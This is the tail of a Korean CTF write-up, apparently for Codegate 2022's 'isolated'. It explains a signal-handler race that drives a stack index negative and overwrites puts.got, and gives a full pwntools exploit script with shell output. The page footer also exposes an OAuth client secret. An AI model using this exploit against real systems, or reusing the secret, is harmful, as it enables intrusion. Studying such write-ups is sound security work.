<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">push_handler</span><span class="params">()</span> <span class="comment">// 0x15c2</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> stack_idx; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( g_stack_idx &gt; <span class="number">767</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    g_context-&gt;state = ERROR;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( log_enabled )</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;[*] PUSH stack[0x%x] = 0x%x\n&quot;</span>, (<span class="type">unsigned</span> <span class="type">int</span>)g_stack_idx, g_context-&gt;reg);</span><br><span class="line">    stack_idx = g_stack_idx++;</span><br><span class="line">    <span class="built_in">stack</span>[stack_idx] = g_context-&gt;reg;</span><br><span class="line">    g_context-&gt;state = SUCCESS;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>pop_handler</code> 함수는 <code>g_stack_idx</code> 가 0이 아닌 경우 1을 감소시키고, <code>stack[g_stack_idx]</code> 를 <code>g_context-&gt;reg</code> 에 대입합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pop_handler</span><span class="params">()</span>  <span class="comment">// 0x164d</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( g_stack_idx )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( log_enabled )</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;[*] POP stack[0x%x] == 0x%x\n&quot;</span>, (<span class="type">unsigned</span> <span class="type">int</span>)(g_stack_idx - <span class="number">1</span>), <span class="built_in">stack</span>[g_stack_idx - <span class="number">1</span>]);</span><br><span class="line">    g_context-&gt;reg = <span class="built_in">stack</span>[--g_stack_idx];</span><br><span class="line">    g_context-&gt;state = SUCCESS;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    g_context-&gt;state = ERROR;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>clean_handler</code> 함수는 <code>g_stack_idx</code> 를 0으로 초기화시킵니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">clean_handler</span><span class="params">()</span>  <span class="comment">// 0x16f7</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( log_enabled )</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[*] CLEAN STACK&quot;</span>);</span><br><span class="line">  <span class="built_in">stack</span>[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line">  g_stack_idx = <span class="number">0</span>;</span><br><span class="line">  g_context-&gt;state = SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>log_handler</code> 함수는 <code>log_enabled</code> 에 <code>g_context-&gt;reg</code> 를 대입합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">log_handler</span><span class="params">()</span>  <span class="comment">// 0x1736</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;[!] I prepared log feature for you :)&quot;</span>);</span><br><span class="line">  log_enabled = g_context-&gt;reg;</span><br><span class="line">  g_context-&gt;state = SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>가상머신의 전체 구조를 훑어보았습니다. 이제 다시 자식 프로세스로 돌아가 <code>run</code> 함수에서 opcode를 파싱하는 코드를 살펴보겠습니다. <code>run</code> 함수는 switch 구문을 반복하면서 파싱을 수행하는데, 각각의 case 블록에서 공통적인 부분은 다음과 같습니다.</p>
<ol>
<li><code>PUSH</code> 를 제외한 인자가 있는 opcode는 인자를 opcode에 포함하여 전달할지, <code> stack</code> 에서 <code>POP</code> 하여 전달할지 플래그 값을 통해 선택할 수 있습니다.
<ul>
<li>플래그 값이 <code>\x66</code> 이면 opcode가 인자를 포함하고 있고, <code>\x55</code> 면 <code>send_locked</code> 함수를 호출하여 <code>POP</code> 명령을 수행한 후 결과를 인자로 전달합니다.</li>
</ul>
</li>
<li><code>ADD</code> , <code>SUB</code> , <code>MUL</code> , <code>DIV</code> , <code>CMP</code> 는 opcode의 구조가 완전히 동일하며, 이 중 <code>CMP</code> 를 제외한 나머지는 <code>send_locked</code> 함수를 호출하여 결과를 <code>stack</code> 에 <code>PUSH</code> 합니다.</li>
</ol>
<p>다음은 opcode를 파싱하는 switch 구문입니다. 각각의 opcode는 첫 바이트가 종류를 나타내며 case에 해당합니다. 나머지 바이트들은 주석에 나타낸 바와 같이 플래그 값과 경우에 따라 인자들로 구성되어 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> ( code[op] )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">0</span>:                                   <span class="comment">// PUSH [u32 arg1]</span></span><br><span class="line">    push_arg1 = *(_DWORD *)&amp;code[pc];</span><br><span class="line">    pc += <span class="number">4</span>;</span><br><span class="line">    send(ppid, context, PUSH, push_arg1);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">1</span>:                                   <span class="comment">// POP</span></span><br><span class="line">    send(ppid, context, POP, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">2</span>:                                   <span class="comment">// ADD [u8 flag1] [optional u32 arg1] [u8 flag2] [optional u32 arg2]</span></span><br><span class="line">                                            <span class="comment">// add two arguments and push</span></span><br><span class="line">    _pc = pc;</span><br><span class="line">    v21 = pc + <span class="number">1</span>;</span><br><span class="line">    add_flag1 = code[_pc];</span><br><span class="line">    <span class="keyword">if</span> ( add_flag1 == <span class="number">0x66</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      add_arg1 = *(_DWORD *)&amp;code[v21];</span><br><span class="line">      v21 += <span class="number">4</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( add_flag1 != <span class="number">0x55</span> )</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">      send_locked(ppid, context, POP, <span class="number">0</span>);</span><br><span class="line">      add_arg1 = context-&gt;reg;</span><br><span class="line">    &#125;</span><br><span class="line">    v6 = v21;</span><br><span class="line">    pc = v21 + <span class="number">1</span>;</span><br><span class="line">    add_flag2 = code[v6];</span><br><span class="line">    <span class="keyword">if</span> ( add_flag2 == <span class="number">0x66</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      add_arg2 = *(_DWORD *)&amp;code[pc];</span><br><span class="line">      pc += <span class="number">4</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( add_flag2 != <span class="number">0x55</span> )</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">      send_locked(ppid, context, POP, <span class="number">0</span>);</span><br><span class="line">      add_arg2 = context-&gt;reg;</span><br><span class="line">    &#125;</span><br><span class="line">    send_locked(ppid, context, PUSH, add_arg2 + add_arg1);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">3</span>:                                   <span class="comment">// SUB [u8 flag1] [optional u32 arg1] [u8 flag2] [optional u32 arg2]</span></span><br><span class="line">                                            <span class="comment">// subtract two arguments and push</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">case</span> <span class="number">4</span>:                                   <span class="comment">// MUL [u8 flag1] [optional u32 arg1] [u8 flag2] [optional u32 arg2]</span></span><br><span class="line">                                            <span class="comment">// multiply two arguments and push</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">case</span> <span class="number">5</span>:                                   <span class="comment">// DIV [u8 flag1] [optional u32 arg1] [u8 flag2] [optional u32 arg2]</span></span><br><span class="line">                                            <span class="comment">// divide two arguments and push</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">case</span> <span class="number">6</span>:                                   <span class="comment">// CMP [u8 flag1] [optional u32 arg1] [u8 flag2] [optional u32 arg2]</span></span><br><span class="line">                                            <span class="comment">// compare two arguments and save result to eflags</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">case</span> <span class="number">9</span>:                                   <span class="comment">// CLEAN</span></span><br><span class="line">    send_locked(ppid, context, CLEAN, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">10</span>:                                  <span class="comment">// LOG [u8 arg1] [u32 optional arg2]</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">default</span>:</span><br><span class="line">    send(ppid, context, (<span class="keyword">enum</span> signal)<span class="number">9u</span>, <span class="number">0</span>);<span class="comment">// SIGKILL</span></span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="%EB%AC%B8%EC%A0%9C-%ED%92%80%EC%9D%B4" tabindex="-1">문제 풀이</h2>
<p>자식 프로세스의 시스템 콜 필터링으로 인해 앞서 언급한 바와 같이 부모 프로세스를 익스플로잇해야 합니다. 익스플로잇은 다음과 같은 취약점을 바탕으로 수행합니다.</p>
<ol>
<li><code>g_stack_idx</code> 의 자료형이 <code>int</code> 로, <code>push_handler</code> 와 <code>pop_handler</code> 함수에서 충분하지 않은 경계 검사를 수행하고 있습니다.
<ul>
<li><code>g_stack_idx</code> 의 값을 음수로 만들 수 있다면 두 함수의 경계 검사를 모두 통과하여, <code>stack</code> 보다 낮은 주소의 메모리에 대한 읽기와 쓰기가 가능합니다.</li>
</ul>
</li>
<li><code>PUSH</code> 와 <code>POP</code> opcode는 블로킹 방식의 <code>send_blocked</code> 함수가 아닌 <code>send</code> 함수를 호출하고 있습니다.</li>
</ol>
<p><code>run</code> 함수의 switch 구문을 보면 <code>PUSH</code> 와 <code>POP</code> opcode를 처리하는 case 블록에서 단순히 <code>send</code> 함수를 호출하여 시그널을 전송하도록 하고 있습니다. <code>send</code> 함수는 <code>send_blocked</code> 함수와 달리 부모 프로세스에서 실행 중인 핸들러 함수가 종료할 때까지 기다리는 메커니즘이 존재하지 않아, 연속하여 호출할 경우 의도하지 않은 결과를 일으킬 수 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> ( code[op] )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">0</span>:                                   <span class="comment">// PUSH [u32 arg1]</span></span><br><span class="line">    push_arg1 = *(_DWORD *)&amp;code[pc];</span><br><span class="line">    pc += <span class="number">4</span>;</span><br><span class="line">    send(ppid, context, PUSH, push_arg1);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="keyword">case</span> <span class="number">1</span>:                                   <span class="comment">// POP</span></span><br><span class="line">    send(ppid, context, POP, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">break</span>;</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure>
<p>시그널 핸들러로의 흐름 전환은 유저 모드의 코드를 실행하고 있는 한 언제나 발생할 수 있습니다. 따라서 원칙적으로 핸들러 함수는 재진입성이 보장되어야(reentrant) 하며, 최소한 시그널의 전달 자체만이라도 블로킹 방식으로 이루어져야 합니다. 여기서 재진입성의 보장이란 핸들러 함수를 실행하는 도중 임의 시점에서 시그널을 받아 함수 내부에서 같은 핸들러 함수를 호출하더라도, 기존 핸들러 함수의 실행 결과에 영향을 주지 않아야 함을 의미합니다.</p>
<p>그러나 <code>push_handler</code> 와 <code>pop_handler</code> 함수에서 이루어지는 <code>g_stack_idx</code> 전역 변수에 대한 증감 연산은 원자적이지 않을(non-atomic) 뿐더러, 시그널의 전송 과정도 블로킹 방식을 사용하고 있지 않습니다. 예를 들어 <code>g_stack_idx</code> 의 값이 1이고 두 개의 <code>POP</code> opcode를 파싱하여 시그널을 전송하는 상황을 생각해보겠습니다. 만약 전송이 블로킹 방식으로 이루어졌다면 다음과 같이 <code>pop_handler</code> 의 조건문에 의해 <code>g_stack_idx</code> 의 값은 음수가 될 수 없습니다.</p>
<p><img src="/images/codegate22-isolated/1.png" alt="1.png"></p>
<p>그런데 블로킹 방식이 아닌 상황에서는 <code>pop_handler</code> 의 조건문을 통과한 상태에서 다음과 같이 추가적인 시그널에 인한 재진입이 발생할 수 있습니다. 이 경우 재진입한 핸들러를 포함하여 <code>g_stack_idx</code> 에 대한 증감 연산이 두 번 모두 이루어져 값이 음수가 될 수 있습니다.</p>
<p><img src="/images/codegate22-isolated/2.png" alt="2.png"></p>
<p><code>push_handler</code> 와 <code>pop_handler</code> 는 각각 <code>g_stack_idx</code> 가 767보다 작거나 같은지, 0이 아닌지만 검사합니다. 따라서 일단  <code>g_stack_idx</code> 의 값을 음수로 만들고 나면 연속된 <code>POP</code> opcode 등으로 얼마든지 값을 감소시켜, <code>stack</code> 보다 낮은 주소의 메모리에 대한 자유로운 읽기와 쓰기가 가능해집니다. <code>puts.got</code> 는 <code>stack</code> 보다 낮은 주소에 있고 <code>puts</code> 라이브러리 함수의 주소가 저장되어 있으므로, <code>SUB</code> opcode 등을 이용하여 oneshot 가젯의 주소로 변조하면 셸을 획득할 수 있습니다.</p>
<p>다음은 위의 내용을 바탕으로 작성한 익스플로잇 코드입니다. 37행은 <code>CLEAN</code> , 2번의 <code>PUSH</code> , 3번의 <code>POP</code> 을 반복하여 <code>g_stack_idx</code> 의 값이 음수가 되도록 합니다. 46행은 블로킹 방식의 <code>POP</code> 을 반복하여 <code>puts.got</code> 를 참조할 수 있도록 <code>g_stack_idx</code> 를 감소시키는데, 반복 횟수는 실행 환경에 따라 시행착오를 거쳐야 합니다. 52행은 <code>SUB</code> opcode를 사용해 <code>puts.got</code> 에 oneshot 가젯의 주소를 대입합니다. 익스플로잇 코드를 수차례 실행하면 셸을 획득할 수 있습니다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&quot;localhost&quot;</span>, <span class="number">7777</span>)</span><br><span class="line"><span class="comment"># r = process(&quot;./isolated&quot;)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pop</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">__opcode</span>(<span class="params">op, pop1, pop2, args=[<span class="number">0</span>, <span class="number">0</span>]</span>):</span><br><span class="line">    s = p8(op) + (p8(<span class="number">0x55</span>) <span class="keyword">if</span> pop1 <span class="keyword">else</span> p8(<span class="number">0x66</span>) + p32(args[<span class="number">0</span>]))</span><br><span class="line">    s += (p8(<span class="number">0x55</span>) <span class="keyword">if</span> pop2 <span class="keyword">else</span> p8(<span class="number">0x66</span>) + p32(args[<span class="number">1</span>]))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> s</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sub</span>(<span class="params">pop1, pop2, args=[<span class="number">0</span>, <span class="number">0</span>]</span>):</span><br><span class="line">    <span class="keyword">return</span> __opcode(<span class="number">3</span>, pop1, pop2, args)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">cmp</span>(<span class="params">pop1, pop2, args=[<span class="number">0</span>, <span class="number">0</span>]</span>):</span><br><span class="line">    <span class="keyword">return</span> __opcode(<span class="number">6</span>, pop1, pop2, args)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">clean</span>():</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">9</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">log</span>(<span class="params">pop, arg=<span class="number">0</span></span>):</span><br><span class="line">    <span class="keyword">return</span> p8(<span class="number">10</span>) + (p8(<span class="number">0x55</span>) <span class="keyword">if</span> pop <span class="keyword">else</span> p8(<span class="number">0x66</span>) + p32(arg))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="comment"># start race</span></span><br><span class="line">    payload = log(<span class="literal">False</span>, <span class="number">1</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">        payload += clean()</span><br><span class="line">        payload += sub(<span class="literal">False</span>, <span class="literal">False</span>, [<span class="number">0</span>, <span class="number">0</span>])</span><br><span class="line">        payload += sub(<span class="literal">False</span>, <span class="literal">False</span>, [<span class="number">0</span>, <span class="number">0</span>])</span><br><span class="line">        payload += pop()</span><br><span class="line">        payload += pop()</span><br><span class="line">        payload += pop()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># set stack_idx to -59</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">27</span>):</span><br><span class="line">        payload += cmp(<span class="literal">True</span>, <span class="literal">True</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">        payload += sub(<span class="literal">True</span>, <span class="literal">False</span>, [<span class="number">0</span>, <span class="number">0</span>])</span><br><span class="line"></span><br><span class="line">    <span class="comment"># set puts.got to oneshot</span></span><br><span class="line">    payload += sub(<span class="literal">True</span>, <span class="literal">False</span>, [<span class="number">0</span>, <span class="number">0x3166e</span>])</span><br><span class="line"></span><br><span class="line">    <span class="comment"># trigger oneshot</span></span><br><span class="line">    payload += log(<span class="literal">False</span>, <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    r.sendafter(<span class="string">b&quot;opcodes &gt;&quot;</span>, payload)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ ./ex.py</span><br><span class="line">[+] Opening connection to localhost on port 7777: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">[!] I prepared <span class="built_in">log</span> feature <span class="keyword">for</span> you :)</span><br><span class="line"><span class="comment"># ...</span></span><br><span class="line">[*] POP stack[0xffffffc5] == 0xf7a62aa0</span><br><span class="line">[*] PUSH stack[0xffffffc5] = 0xf7a31432</span><br><span class="line">$ <span class="built_in">id</span></span><br><span class="line">uid=1000(ctf) gid=1000(ctf) <span class="built_in">groups</span>=1000(ctf)</span><br></pre></td></tr></table></figure>
<h2 id="%EC%B0%B8%EA%B3%A0%EC%9E%90%EB%A3%8C" tabindex="-1">참고자료</h2>
<p>[1] M. Dowd, J. McDonald and J. Schuh, “Chapter 13. Synchronization and State,” in <em>The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities</em>. Boston, MA: Addison-Wesley, 2006, pp. 797-821.</p>
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/katex/dist/katex.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/markdown-it-texmath/css/texmath.min.css">

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/05/codegate22-vimt/" rel="prev" title="[Codegate CTF 2022] VIMT">
                  <i class="fa fa-chevron-left"></i> [Codegate CTF 2022] VIMT
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/07/17/cpp-exception-handling/" rel="next" title="C++ 예외 처리의 구현">
                  C++ 예외 처리의 구현 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class=""></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Juhyun Song</span>
</div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.1/es5/tex-mml-chtml.js","integrity":"sha256-hlC2uSQYTmPsrzGZTEQEg9PZ1a/+SV6VBCTclohf2og="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"juhyun167","repo":"juhyun167.github.io","client_id":"97ef06bf938b3dfb0c5b","client_secret":"210c90c45a592282824bbc4312dbc74b3709bbea","admin_user":"juhyun167","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"en","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.min.js","integrity":"sha256-Pmj85ojLaPOWwRtlMJwmezB/Qg8BzvJp5eTzvXaYAfA="},"path_md5":"ba5eb17adbf9746e7bd9561071ce1f99"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>

</body>
</html>
